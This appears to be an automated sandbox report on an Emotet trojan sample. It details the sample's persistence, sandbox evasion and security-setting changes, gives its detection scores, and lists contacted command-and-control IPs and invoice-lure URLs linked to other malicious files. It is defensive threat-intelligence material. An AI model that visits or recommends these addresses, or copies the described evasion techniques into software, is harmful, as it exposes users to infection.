Source: C:\Windows\SysWOW64\servicerpc.exe	Process created: C:\Windows\SysWOW64\servicerpc.exe C:\Windows\SysWOW64\servicerpc.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable	Jump to behavior

Source: C:\Users\user\Desktop\0HvIGwMmBV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: 0HvIGwMmBV.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\0HvIGwMmBV.exe

Code function: 0_2_00E81F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

0_2_00E81F40

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\SysWOW64\servicerpc.exe

Executable created and started: C:\Windows\SysWOW64\servicerpc.exe

Jump to behavior

Source: C:\Users\user\Desktop\0HvIGwMmBV.exe

PE file moved: C:\Windows\SysWOW64\servicerpc.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\0HvIGwMmBV.exe

File opened: C:\Windows\SysWOW64\servicerpc.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Users\user\Desktop\0HvIGwMmBV.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-2121

Source: C:\Users\user\Desktop\0HvIGwMmBV.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\0HvIGwMmBV.exe

API coverage: 6.5 %

Source: C:\Windows\System32\svchost.exe TID: 5980

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\0HvIGwMmBV.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 00000008.00000002.464743444.0000026F176B0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000006.00000002.466618432.0000022919460000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000006.00000002.464116673.0000022913C2A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.464168532.000001EA9A802000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000008.00000002.464743444.0000026F176B0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000008.00000002.464743444.0000026F176B0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000007.00000002.464217145.000001EA9A829000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.464440169.0000026F17040000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.464094285.0000022A2D22A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000008.00000002.464743444.0000026F176B0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\servicerpc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\0HvIGwMmBV.exe

Code function: 0_2_00E81F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

0_2_00E81F40

Source: C:\Users\user\Desktop\0HvIGwMmBV.exe

Code function: 0_2_00E81BE0 mov eax, dword ptr fs:[00000030h]

0_2_00E81BE0

Source: C:\Users\user\Desktop\0HvIGwMmBV.exe

Code function: 0_2_00E89EE0 EntryPoint,GetProcessHeap,RtlAllocateHeap,memset,GetProcessHeap,RtlFreeHeap,ExitProcess,

0_2_00E89EE0

Source: svchost.exe, 00000009.00000002.464715555.000001CE21F90000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: svchost.exe, 00000009.00000002.464715555.000001CE21F90000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000009.00000002.464715555.000001CE21F90000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: svchost.exe, 00000009.00000002.464715555.000001CE21F90000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\0HvIGwMmBV.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\servicerpc.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\0HvIGwMmBV.exe

Code function: 0_2_00E88D50 RtlGetVersion,GetNativeSystemInfo,

0_2_00E88D50

Source: C:\Windows\SysWOW64\servicerpc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: svchost.exe, 0000000D.00000002.464104258.000001836263D000.00000004.00000001.sdmp	Binary or memory string: @V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000D.00000002.464169165.0000018362702000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0HvIGwMmBV.exe, type: SAMPLE
Source: Yara match	File source: 00000001.00000002.204042221.0000000000E81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.196655416.0000000000E81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.463934168.0000000000E81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.203686958.0000000000E81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.203264019.0000000000E81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.195788006.0000000000E81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.202503920.0000000000E81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.0.0HvIGwMmBV.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.servicerpc.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.servicerpc.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.0HvIGwMmBV.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.servicerpc.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0HvIGwMmBV.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.servicerpc.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.0HvIGwMmBV.exe.e80000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	Process Injection2	Masquerading121	OS Credential Dumping	Security Software Discovery51	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API11	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion3	Security Account Manager	Process Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Information Discovery24	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
0HvIGwMmBV.exe	83%	Virustotal		Browse
0HvIGwMmBV.exe	97%	ReversingLabs	Win32.Trojan.Emotet
0HvIGwMmBV.exe	100%	Avira	TR/Crypt.XPACK.Gen
0HvIGwMmBV.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.0.servicerpc.exe.e80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.0HvIGwMmBV.exe.e80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.servicerpc.exe.e80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.servicerpc.exe.e80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.0HvIGwMmBV.exe.e80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.0HvIGwMmBV.exe.e80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.0HvIGwMmBV.exe.e80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.servicerpc.exe.e80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://79.172.249.82:443/	3%	Virustotal		Browse
https://79.172.249.82:443/	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://79.172.249.82:443/	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 0000000B.00000003.308097971.000001BC42260000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000B.00000003.308132894.000001BC4223D000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000B.00000002.308423829.000001BC4223E000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000B.00000003.308097971.000001BC42260000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000B.00000002.308423829.000001BC4223E000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 0000000B.00000002.308434753.000001BC4224F000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000B.00000002.308423829.000001BC4223E000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 0000000B.00000003.308132894.000001BC4223D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000B.00000003.308097971.000001BC42260000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 0000000B.00000003.308132894.000001BC4223D000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000B.00000002.308423829.000001BC4223E000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000B.00000003.308132894.000001BC4223D000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 00000008.00000002.464440169.0000026F17040000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000B.00000002.308434753.000001BC4224F000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 0000000B.00000003.286359870.000001BC42232000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000B.00000003.286359870.000001BC42232000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 0000000B.00000003.308097971.000001BC42260000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 0000000B.00000003.308097971.000001BC42260000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000B.00000003.308117767.000001BC4225C000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000B.00000003.286359870.000001BC42232000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 0000000B.00000002.308441069.000001BC42258000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	svchost.exe, 00000006.00000002.466783419.0000022919600000.00000002.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000B.00000003.308132894.000001BC4223D000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000B.00000002.308434753.000001BC4224F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.308132894.000001BC4223D000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.308117767.000001BC4225C000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000B.00000003.308097971.000001BC42260000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 0000000B.00000002.308420615.000001BC4223B000.00000004.00000001.sdmp	false		high
https://appexmapsappupdate.blob.core.windows.net	svchost.exe, 0000000B.00000003.308097971.000001BC42260000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000B.00000002.308441069.000001BC42258000.00000004.00000001.sdmp	false		high
https://activity.windows.com	svchost.exe, 00000008.00000002.464440169.0000026F17040000.00000004.00000001.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 0000000B.00000002.308399355.000001BC42213000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 0000000B.00000003.308097971.000001BC42260000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 0000000B.00000002.308423829.000001BC4223E000.00000004.00000001.sdmp	false		high
https://%s.dnet.xboxlive.com	svchost.exe, 00000008.00000002.464440169.0000026F17040000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000B.00000003.308117767.000001BC4225C000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
193.169.54.12	unknown	Germany	49464	ICFSYSTEMSDE	false
173.230.145.224	unknown	United States	63949	LINODE-APLinodeLLCUS	false
79.172.249.82	unknown	Hungary	43711	SZERVERNET-HU-ASHU	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	376928
Start date:	27.03.2021
Start time:	23:29:55
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	0HvIGwMmBV (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.evad.winEXE@17/8@0/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 85.6% (good quality ratio 73.9%) Quality average: 75.5% Quality standard deviation: 34.7%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 104.43.193.48, 168.61.161.212, 52.147.198.201, 20.82.210.154, 23.218.208.56, 92.122.213.201, 92.122.213.249, 20.54.26.129 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:31:09	API Interceptor	2x Sleep call for process: svchost.exe modified
23:32:24	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
193.169.54.12	_01_.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	hEHN0WzBF.exe	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	http://baseballpontedipiave.com/Sales-Invoice/	Get hash	malicious	Browse	193.169.54.12:8080/
	emotet2.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	20180212-20_46_01_.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/	Get hash	malicious	Browse	193.169.54.12:8080/
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	mj03dyvx_2076767.exe	Get hash	malicious	Browse	193.169.54.12:8080/
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	RDuYHvb2jQ.exe	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	http://okomekai.symphonic-net.com/Invoice-69070770/	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding invoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding invoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	mail.rodolfogvalencia.com/Invoice/	Get hash	malicious	Browse	193.169.54.12:8080/
173.230.145.224	mj03dyvx_2076767.exe	Get hash	malicious	Browse	173.230.145.224:8080/
	Scan1782384.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	Scan1782384.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	RDuYHvb2jQ.exe	Get hash	malicious	Browse	173.230.145.224:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	http://okomekai.symphonic-net.com/Invoice-69070770/	Get hash	malicious	Browse	173.230.145.224:8080/
	Outstanding invoice.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	Outstanding invoice.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	mail.rodolfogvalencia.com/Invoice/	Get hash	malicious	Browse	173.230.145.224:8080/
	74039.exe	Get hash	malicious	Browse	173.230.145.224:8080/
	Dokumente.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	Dokumente.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	http://bri8pos.in/Outstanding-INVOICE-VKBH/2570051/445/	Get hash	malicious	Browse	173.230.145.224:8080/
	uSUbynSM4.exe	Get hash	malicious	Browse	173.230.145.224:8080/
	nbtDJb.exe	Get hash	malicious	Browse	173.230.145.224:8080/
	EmQ2Ard8g4.exe	Get hash	malicious	Browse	173.230.145.224:8080/
	Aj82OO6oKIHl4B.exe	Get hash	malicious	Browse	173.230.145.224:8080/
	http://cinetiux.com/LLC/?newinvoice01.doc	Get hash	malicious	Browse	173.230.145.224:8080/
	Emotet119.doc	Get hash	malicious	Browse	173.230.145.224:8080/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ICFSYSTEMSDE	pitEBNziGR.exe	Get hash	malicious	Browse	193.169.54.12
	_01_.doc	Get hash	malicious	Browse	193.169.54.12
	hEHN0WzBF.exe	Get hash	malicious	Browse	193.169.54.12
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12
	http://baseballpontedipiave.com/Sales-Invoice/	Get hash	malicious	Browse	193.169.54.12
	emotet2.doc	Get hash	malicious	Browse	193.169.54.12
	20180212-20_46_01_.doc	Get hash	malicious	Browse	193.169.54.12
	http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/	Get hash	malicious	Browse	193.169.54.12
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12
	mj03dyvx_2076767.exe	Get hash	malicious	Browse	193.169.54.12
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12
	RDuYHvb2jQ.exe	Get hash	malicious	Browse	193.169.54.12
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12
	http://okomekai.symphonic-net.com/Invoice-69070770/	Get hash	malicious	Browse	193.169.54.12
	Outstanding invoice.doc	Get hash	malicious	Browse	193.169.54.12
	Outstanding invoice.doc	Get hash	malicious	Browse	193.169.54.12
SZERVERNET-HU-ASHU	pitEBNziGR.exe	Get hash	malicious	Browse	79.172.249.82
	https://kaliconsultancy.com/wp-content/uploads/2020/09/wflnfkqajn.php	Get hash	malicious	Browse	79.172.193.55
	https://delina.hu/praktikak/2016/02/01/csinalj-te-is-kreativ-mozaikkoveket	Get hash	malicious	Browse	95.140.36.82
	762002910000000.exe	Get hash	malicious	Browse	79.172.193.32
	1Wire_Copy.exe	Get hash	malicious	Browse	79.172.242.87
	430#U0437.js	Get hash	malicious	Browse	79.172.193.32
	59Transfer-copy.exe	Get hash	malicious	Browse	79.172.242.92
	25wire_slip.exe	Get hash	malicious	Browse	79.172.242.89
	BK.485799485.jse	Get hash	malicious	Browse	79.172.193.32
	PO 2312 CBD- 1302 S18.doc	Get hash	malicious	Browse	79.172.242.87
	RDuYHvb2jQ.exe	Get hash	malicious	Browse	79.172.249.82
	Outstanding Invoices.doc	Get hash	malicious	Browse	79.172.249.82
